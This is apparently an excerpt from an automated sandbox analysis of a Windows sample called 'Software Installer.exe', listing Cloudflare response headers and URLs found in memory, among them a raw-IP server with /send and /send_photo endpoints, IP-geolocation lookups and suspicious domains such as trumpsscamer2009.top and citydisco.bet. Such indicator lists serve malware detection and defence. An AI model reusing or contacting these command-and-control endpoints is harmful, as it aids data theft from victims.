    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nkIc25F3IAL6NqQ6Fro2FLTESs9W80qQ7AAh%2BiDbM5s6g53aTCSuoQzYjCHTFVBmqy5fXxXCSDui3yX%2FZwUneUxtbh7sufSTjD%2F8a18yg8oNwcZOGP6YITg015tIwqiyIwCIfBj0%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9205eb211823ed71-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2020&min_rtt=1998&rtt_var=765&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=730&delivery_rate=1461461&cwnd=123&unsent_bytes=0&cid=591e55e01242c7ff&ts=312&x=0"
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
    Date: Fri, 14 Mar 2025 18:43:50 GMT
    Content-Type: text/html; charset=iso-8859-1
    Transfer-Encoding: chunked
    Connection: close
    Cache-Control: max-age=14400
    cf-cache-status: EXPIRED
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7BF9AtlHLVfFLwItaEAeSpHDcFfDyS7qrvA8EwhuHC7ZRySJxtj0L%2BEQQprXW4DfPOPTYweoUMOMNdvjZATvP2lpR6lNVX5VFYWdX7KsDib9cn4iOsAprKlUdeJKrYt%2Bxhu3twPE6Q%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9205eb3f2e7e5e80-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1568&rtt_var=600&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=730&delivery_rate=1805813&cwnd=214&unsent_bytes=0&cid=f49fdede2593f134&ts=332&x=0"
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
    Date: Fri, 14 Mar 2025 18:43:59 GMT
    Content-Type: text/html; charset=iso-8859-1
    Transfer-Encoding: chunked
    Connection: close
    Age: 16
    Cache-Control: max-age=14400
    cf-cache-status: HIT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vKdcBAGmHfXSSJAV60gNIcAp2snSTinGr%2BsK5aSIxw3BbD2P9sBvDdJU6M8qD5nbxrO375yJyWjeDaa17WoLHTg7ckLRRDZb0k5yOay9FRXIKMU8W54PZIVygSkUyzfq80%2By5v3gaw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9205eb760f45d2b1-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2029&min_rtt=1997&rtt_var=813&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=730&delivery_rate=1295474&cwnd=83&unsent_bytes=0&cid=c76b7230f9d2313b&ts=139&x=0"
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
    Date: Fri, 14 Mar 2025 18:44:15 GMT
    Content-Type: text/html; charset=iso-8859-1
    Transfer-Encoding: chunked
    Connection: close
    Age: 25
    Cache-Control: max-age=14400
    cf-cache-status: HIT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u2QzadpzatG93l44MMMav7FlNRiWN3OwwwdA3Dt%2BuToFTnEAOhi4DPK9ssOgMsEYOy%2FB09YSmxDntx4xi454b%2BeAVKgJXK4En4FZ9IC3zjD%2FBRJ%2B8%2FJNhhpMsr0nbWGsnP5I7XGvfw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9205ebdddfbef799-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1591&rtt_var=609&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=730&delivery_rate=1780487&cwnd=208&unsent_bytes=0&cid=523e0a0a934197cc&ts=138&x=0"
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
    Date: Fri, 14 Mar 2025 18:44:48 GMT
    Content-Type: text/html; charset=iso-8859-1
    Transfer-Encoding: chunked
    Connection: close
    Age: 57
    Cache-Control: max-age=14400
    cf-cache-status: HIT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DtQDVZy4Gluo6o%2FnkxXAUR9Q2w6xtg13VKVGQmckwgbKBUVHetRc686XARn%2F8ypGdmSMtltzPuqH%2FyR%2BZJosGTkpCMINljLirIg9y9Ed4az2Hs%2BDJkBqsV7ENu%2F4etCdCPN6DaVsPw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9205eca9bea34388-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1558&rtt_var=600&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=730&delivery_rate=1800246&cwnd=219&unsent_bytes=0&cid=2b935c4c91e2528c&ts=170&x=0"
Source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.css
Source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.jpg
Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E35A8000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E30C6000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://83.217.208.69:5000/
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C00000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E30E1000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://83.217.208.69:5000/send
Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E30C6000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://83.217.208.69:5000/send_photo
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C00000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E3000000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org
Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E3000000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org/
Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E30D7000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E30BF000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E31ED000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E3000000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org:80/
Source: powershell.exe, 00000001.00000002.1567265583.000001E864080000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micros
Source: powershell.exe, 00000003.00000002.1451271173.0000011AE08D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoft.c
Source: powershell.exe, 00000003.00000002.1451271173.0000011AE08D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoft.ctain
Source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C00000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E3096000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json/
Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E30D7000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E3096000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E31ED000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E30C6000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json/8.46.123.189
Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E30D7000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json/8.46.123.189P
Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E3096000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com:80/
Source: powershell.exe, 00000001.00000002.1537154650.000001E85BC96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1451937888.0000011AE3E4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1496243972.0000011AF24F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1496243972.0000011AF2639000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1708631354.000001A997795000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1581805371.000001A987948000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E309C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org
Source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2649435379.000001D772E10000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E309C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer
Source: Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/System.IO
Source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/System.Runtime.Serialization
Source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml
Source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml.Linq
Source: Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/SystemV
Source: Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/SystemY
Source: Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/dhttp://schemas.datacontract.org/2004/07/System.XmlRhttp://w
Source: powershell.exe, 00000001.00000002.1456923011.000001E84BE48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1581805371.000001A987948000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649480850.000001D773211000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649544937.000001D773240000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2649435379.000001D772E10000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649480850.000001D773211000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649544937.000001D773240000.00000004.10000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1456923011.000001E84BC21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1451937888.0000011AE2481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1581805371.000001A987721000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamevhttp://schemas.xmlsoap.o
Source: powershell.exe, 00000001.00000002.1456923011.000001E84BE48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1581805371.000001A987948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000003.00000002.1451937888.0000011AE3A5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://trumpsscamer2009.top
Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E35CE000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E35ED000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E35DE000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E35B3000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E35C0000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E33BE000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E3593000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E35A8000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E31ED000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E30EE000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E31DA000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E31E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://trumpsscamer2009.top:443/
Source: powershell.exe, 00000006.00000002.1581805371.000001A987948000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1508507784.0000011AFAB7B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.D
Source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774886000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652757290.000001D775090000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649978603.000001D773AE6000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://aka.ms/binaryformatter
Source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://aka.ms/dotnet-core-applaunch?
Source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://aka.ms/dotnet-core-applaunch?Description:
Source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774886000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649978603.000001D773AE6000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://aka.ms/dotnet-illink/com
Source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774886000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649978603.000001D773AE6000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://aka.ms/dotnet-illink/nativehost
Source: Software Installer.exe, 00000000.00000002.2650876819.000001D774886000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649978603.000001D773AE6000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://aka.ms/dotnet-illink/nativehostt
Source: Software Installer.exe, 00000000.00000002.2649978603.000001D773AE6000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649696226.000001D7732B1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654880930.000001D777BE0000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
Source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://aka.ms/dotnet/downloadCommon
Source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://aka.ms/dotnet/info
Source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://aka.ms/dotnet/sdk-not-found
Source: Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: powershell.exe, 00000001.00000002.1456923011.000001E84BC21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1451937888.0000011AE2481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1581805371.000001A987721000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: Software Installer.exe, 00000000.00000002.2652757290.000001D775090000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
Source: Software Installer.exe, 00000000.00000002.2655922975.000001D7782C0000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://aka.ms/systemdrawingnonwindows
Source: MSBuild.exe, 0000000D.00000002.1762556827.0000000001154000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://citydisco.bet/
Source: MSBuild.exe, 0000000D.00000002.1761468258.000000000110B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://citydisco.bet/gdJIS
Source: MSBuild.exe, 0000000D.00000002.1761468258.000000000110B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://citydisco.bet/gdJISz
Source: MSBuild.exe, 0000000D.00000002.1762556827.0000000001154000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://citydisco.bet/y
Source: MSBuild.exe, 0000000D.00000002.1760579162.00000000010F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://citydisco.bet:443/gdJIS
Source: powershell.exe, 00000006.00000002.1708631354.000001A997795000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1708631354.000001A997795000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1708631354.000001A997795000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.1581805371.000001A987948000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: Software Installer.exe, 00000000.00000002.2656419896.000001D778770000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://github.com/dotnet/linker/issues/2715.
Source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2653422218.000001D776DA1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653065772.000001D775261000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2647654410.00000196DC880000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654007016.000001D7775C1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654304809.000001D777801000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652733750.000001D775080000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653948791.000001D777590000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649945136.000001D773320000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650830040.000001D774010000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652331382.000001D774FE0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654943566.000001D777C40000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654693448.000001D777A80000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655606492.000001D778150000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653300355.000001D776D31000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2656419896.000001D778770000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649480850.000001D773211000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/dotnet/runtime
Source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/
Source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/dotnet/runtime/issues/71847
Source: Software Installer.exe, 00000000.00000002.2655922975.000001D7782C0000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://github.com/dotnet/winforms
Source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mono/linker/issues/378
Source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mono/linker/pull/649
Source: powershell.exe, 00000003.00000002.1451937888.0000011AE30B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
